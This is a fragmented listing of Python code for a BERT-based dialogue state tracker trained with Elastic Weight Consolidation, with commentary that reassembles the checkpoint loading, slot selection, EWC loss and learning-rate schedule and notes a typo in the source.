label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5:", "== 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = 
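The checkpoint-loading fragments (`del_list`, `rename_list`, `('slot_lookup' in key)`, `key.replace('rnn.', 'nbt.')`) describe surgery on a pretrained state dict: lookup tables are dropped because the slot/value vocabulary differs between tasks, and an old module name is migrated. A sketch; the final `load_state_dict(..., strict=False)` line is my assumption (the fragments cut off at `state =`):

```python
ptr_model = torch.load(args.load_path, map_location=device)

del_list, rename_list = [], []
for key in ptr_model.keys():
    if ('slot_lookup' in key) or ('value_lookup' in key):
        del_list.append(key)      # remove slot_lookup and value_lookup
    if 'rnn.' in key:
        rename_list.append(key)   # rename rnn -> nbt
for key in del_list:
    del ptr_model[key]
for key in rename_list:
    new_key = key.replace('rnn.', 'nbt.')
    ptr_model[new_key] = ptr_model[key]
    del ptr_model[key]

model.load_state_dict(ptr_model, strict=False)  # assumption: tolerant load
```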
label_ids.unsuqeeze(0) with torch.no_grad():", "1: dialog = [] for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if", "not os.path.exists(vocab_dir): raise ValueError(\"Can't find %s \" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case)", "slot and values are different between the training and evaluation ptr_model = torch.load(args.load_path,", "for n, p in param_optimizer if any(nd in n for nd in no_decay)],", "on the test set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:", "1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\"", "self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return", "eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer,", "str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc == 1: dialog", "Note: slot embeddings are ordered as [previous slots + present target slots] slot_token_ids,", "in trange(1): #### TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps = 0, 0", "last_update = None best_loss = None #### EWC: calculate Fisher ewc = EWC(model,", "label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0] * (max_seq_length - len(label_token_ids))", "({}) already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name", "type=str, required=True, help=\"Target slot idx to train model. ex. 
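Note that the source these shingles index spells `label_ids.unsuqeeze(0)` and `prev_label_ids.unsuqeeze(0)`; if that guard branch ever fired it would raise `AttributeError`, since the tensor method is `unsqueeze`. The intended code is:

```python
# Batches normally arrive as [dialogue, turn, seq]; a single dialogue arrives
# as [turn, seq], so promote it with a leading batch dimension.
if input_ids.dim() == 2:
    input_ids = input_ids.unsqueeze(0)
    input_len = input_len.unsqueeze(0)
    label_ids = label_ids.unsqueeze(0)            # 'unsuqeeze' in the dump is a typo
    prev_label_ids = prev_label_ids.unsqueeze(0)  # same typo here
```

The bug goes unnoticed in practice because the loaders in these fragments always yield 3-dimensional batches.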
'0:1:2 or an excluding", "text_a text_b = line[3] + \" # \" + text_b else: text_a =", "slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if", "del_list = [] rename_list = [] for key in ptr_model.keys(): if ('slot_lookup' in", "all_prev_label_ids) if args.local_rank == -1: train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader", "line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index = line[0] else: # The", "return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features = []", "to run eval on the test set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and", "label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\",", "all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids =", "turn['input'] + '\\t' for label, pred in zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label, pred)", "'' label_map = [{_label: i for i, _label in enumerate(labels)} for labels in", "loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the test set.\")", "turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label:", "\\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt == 'transformer': from", "key in del_list: del ptr_model[key] for key in rename_list: new_key = key.replace('rnn.', 'nbt.')", "calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in", "2\" if len(tokens_a) > max_seq_length - 2: tokens_a = tokens_a[:(max_seq_length - 2)] tokens", "from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization", "[0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy =", "# rename rnn -> nbt, rename_list.append(key) for key in del_list: del ptr_model[key] for", "nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None,", "1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)],", "// torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import FP16_Optimizer from apex.optimizers import FusedAdam", "label in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens)", "features = [] prev_dialogue_idx = None all_padding = [0] * max_seq_length all_padding_len =", "+ self.target_slot logger.info('Processor: previous slots: ' + ', 
'.join(self.prev_slot)) logger.info('Processor: target slots: '+", "allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training to perform linear", "wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots in previous task target_slot_id", "warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step =", "prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc", "num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size *", "epoch > 100 and last_update + args.patience <= epoch: if last_update + args.patience", "help=\"Target slot idx to train model. ex. '0:1:2 or an excluding slot name", ">= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed", "= processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List", "Set the random seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu >", "nb_eval_examples += nb_eval_ex nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot,", "exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1]", "according to the alphabetic order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select", "slot, value = domain if slot == \"pricerange\": slot = \"price range\" if", "of Present task label_list = prev_label_list + target_label_list # All slot value labels", "[(n, p) for n, p in model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias',", "example) in enumerate(examples): tokens_a = [x if x != '#' else '[SEP]' for", "= t_total // torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import FP16_Optimizer from apex.optimizers", "input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids", "task to train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str,", "loss.item() * num_valid_turn dev_acc += acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1,", "maximum total input sequence length after WordPiece tokenization. \\n\" \"Sequences longer than this", "you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list = [] for key in", "len(eval_examples)) logger.info(\" Batch size = %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) #", "nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if loss_slot", "if you want to set the label encoder trainable. 
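The `Processor` fragments around this point reassemble into the slot-selection logic inside `Processor.__init__`: ontology entries are split by index into current-task and previous-task slots, with one DSTC2-style name normalized. A sketch stitched from the shingles:

```python
self.target_slot, self.prev_slot = [], []
self.target_slot_idx = sorted([int(x) for x in config.target_slot.split(':')])
self.prev_slot_idx = sorted([int(x) for x in config.prev_slot.split(':')])

ontology_items = list(self.ontology.items())
for idx, domain in enumerate(ontology_items):
    slot, value = domain
    if slot == "pricerange":
        slot = "price range"            # normalize the concatenated name
    if idx in self.target_slot_idx:
        self.target_slot.append(slot)
    elif idx in self.prev_slot_idx:
        self.prev_slot.append(slot)
self.all_slot = self.prev_slot + self.target_slot
```

Putting previous-task slots first in `self.all_slot` matches the fragment noting that "slot embeddings are ordered as [previous slots + present target slots]".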
\\n\" \"This option is", "prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all':", "maximum total input turn length. \\n\" \"Sequences longer than this will be truncated,", "None, None prev_nb_dev_examples = 0 for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch =", "= example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and (prev_dialogue_idx !=", "if args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file,", "tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0] * (max_seq_length - len(label_token_ids)) label_token_ids +=", "writer: total_class_acc = 0 total_slot_class_acc = [] nlabels = 0 for sid, slot", "self.prev_slot = [] self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx =", "label in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id = %d)", "vid, value in enumerate(slot): if not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid],", "':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() # sorting the ontology according to", "= domain if slot == \"pricerange\": slot = \"price range\" if idx in", "enumerate(examples): tokens_a = [x if x != '#' else '[SEP]' for x in", "f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long) #", "max_seq_length, tokenizer, device): features = [] for label in labels: label_tokens = [\"[CLS]\"]", "\"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False):", "optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total", "label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc", "Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***\" \\ % (epoch, dev_loss,", "args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run prediction for full data", "DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None,", "= %d\" % max_turn) for (ex_index, example) in enumerate(examples): tokens_a = [x if", "the alphabetic order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots to", "TODO ############################################################################### if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace()", "tokens_a = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)]", "-1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should include at least \\\"gru\\\"", "collection of `InputExample`s for the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets", "self.ontology = 
collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot = [] self.prev_slot =", "[\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len = [len(tokens), 0] if tokens_b: tokens +=", "help=\"The number of epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion", "n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc else:", "1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1))", "prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\"", "[len(tokens), 0] if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) +", "args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed manually for reproducibility.", "nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples dev_acc =", "= {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = []", "[{_label: i for i, _label in enumerate(labels)} for labels in label_list] for i,", "in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1", "where the model predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained", "last_update = epoch best_loss = dev_loss best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d,", "nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for n, p in", "prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss =", "len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0]", "model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0):", "0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev", "nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim()", "> 1: model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank()", "or prev_dialogue_index != line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index = line[0]", "to run analysis on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if", "line[3] prev_dialogue_index = line[0] else: # The symbol '#' will be replaced with", "get_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self):", "prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss =", "* loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, 
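The training-step fragments combine the current-task loss with the EWC penalty and then re-score the old task to monitor forgetting. Reassembled as a sketch of one step inside the loop:

```python
# Current task, regularized toward the previous task's parameters.
loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids,
                                           n_gpu, target_slot=target_slot_id)
loss_ewc = ewc.penalty(model)
loss = loss_ + args.lambda_ewc * loss_ewc

# Forgetting is tracked by also evaluating the previous task's slots.
prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len,
                                                 prev_label_ids, n_gpu,
                                                 target_slot=prev_slot_id)
```

Larger `--lambda_ewc` values trade current-task accuracy for retention of the previously-learned slots.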
target_slot=prev_slot_id)", "all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\")", "torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features],", "self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot]", "\\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /=", "n, p in model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters =", "args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/", "TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from", "eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot =", "of Previous task target_label_list = processor.get_labels() # Slot value labels of Present task", "target_label_list = processor.get_labels() # Slot value labels of Present task label_list = prev_label_list", "get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ## Note: slot", "all_label_ids, all_prev_label_ids) if args.local_rank == -1: train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data)", "+= loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if loss_slot is not", "= DDP(model) elif n_gpu > 1: model = torch.nn.DataParallel(model) # Prepare optimizer if", "# list of slots in present task # tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt'", "summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1:", "import EWC model = BeliefTracker(args, num_labels, device) if args.fp16: model.half() # Load pretrained", "/ prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step)", "{}\".format( device, n_gpu, bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid", "target_slot=prev_slot_id) else: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)", "target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task # tokenizer", "tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b: tokens_b = [x if x != '#'", "will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input turn length. 
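The `view(-1, max_turn_length, ...)` fragments show the flat per-turn feature rows being regrouped into per-dialogue blocks, which only works because every dialogue was padded to exactly `max_turn_length` turns above:

```python
# Reshape tensors to [dialogue, turn, word].
all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length)
all_input_len = all_input_len.view(-1, max_turn_length, 2)
all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim)
all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim)
```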
\\n\"", "args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num examples = %d\", len(train_examples))", "BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC", "if args.local_rank != -1: try: from apex.parallel import DistributedDataParallel as DDP except ImportError:", "% slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model", "== 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids =", "loss = loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ =", "be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True,", "not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging", "in n for nd in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate}, ] return optimizer_grouped_parameters", "= model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _, acc, acc_slot, _ =", "for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot,", "all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a sequence pair in place to", "oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in", "eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot,", "as writer: for dialog in incorrect_dialogs: for turn in dialog: text = turn['input']", "# \" + text_b else: text_a = line[2] # line[2]: user utterance text_b", "line[0], line[1]) # line[0]: dialogue index, line[1]: turn index if accumulation: if prev_dialogue_index", "5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x)", "tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" %", "tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ## Note: slot embeddings are", "num_valid_turn for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn", "import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import", "x / warmup return 1.0 - x ############################################################################### # Main ############################################################################### def main():", "of epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training", "16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale', 
type=float, default=0, help=\"Loss scaling to improve", "= None #### EWC: calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device,", "== 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if", "def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation)", "0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer =", "tensors to [batch, turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1,", "+= prev_acc.item() * prev_num_valid_turn if n_gpu == 1: if dev_loss_slot is None: dev_loss_slot", "% (key, str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank ==", "line[3] + \" # \" + text_b else: text_a = line[2] # line[2]:", "[0, 0] max_turn = 0 for (ex_index, example) in enumerate(examples): if max_turn <", "= False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() ==", "slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'),", "############################################################################### def main(): parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location", "with \"- 2\" if len(tokens_a) > max_seq_length - 2: tokens_a = tokens_a[:(max_seq_length -", "tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\" %", "NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if", "0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc += class_acc nlabels", "= input_len self.label_id = label_id self.prev_label_id = prev_label_id # trained slots in previous", "prev_slot_dim) return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features =", "fp16 set to True.\\n\" \"0 (default value): dynamic loss scaling.\\n\" \"Positive power of", "in label_list: token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get", "eval_loss_slot = [ l * nb_eval_ex for l in loss_slot] else: for i,", "prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev)", "in batch) input_ids, input_len, label_ids, _ = batch if n_gpu == 1: loss_,", "all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank == -1: train_sampler", "datefmt='%m/%d/%Y 
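`warmup_linear` appears verbatim in the shingles, as does the manual per-step learning-rate update used on the fp16 path (where `FusedAdam` does not apply the schedule itself). The `lr_this_step` expression below is my assumption about how the two are wired together, based on the conventional `BertAdam`-style usage:

```python
def warmup_linear(x, warmup=0.002):
    # Linear warmup followed by linear decay over training progress x in [0, 1].
    if x < warmup:
        return x / warmup
    return 1.0 - x

# Inside the update step (assumed wiring):
lr_this_step = args.learning_rate * warmup_linear(global_step / t_total,
                                                  args.warmup_proportion)
if summary_writer is not None:
    summary_writer.add_scalar("Train/LearningRate", lr_this_step, global_step)
for param_group in optimizer.param_groups:
    param_group['lr'] = lr_this_step
optimizer.step()
optimizer.zero_grad()
global_step += 1
```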
%H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object):", "bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where the model predictions and", "acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps", "import argparse import random import collections import operator from tqdm import tqdm, trange", "in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id", "labels) def warmup_linear(x, warmup=0.002): if x < warmup: return x / warmup return", "True.\") ############################################################################### # Load data ############################################################################### # Get Processor processor = Processor(args) prev_label_list", "prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc,", "1: loss = loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer", "nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss,", "prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length: features", "= _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += 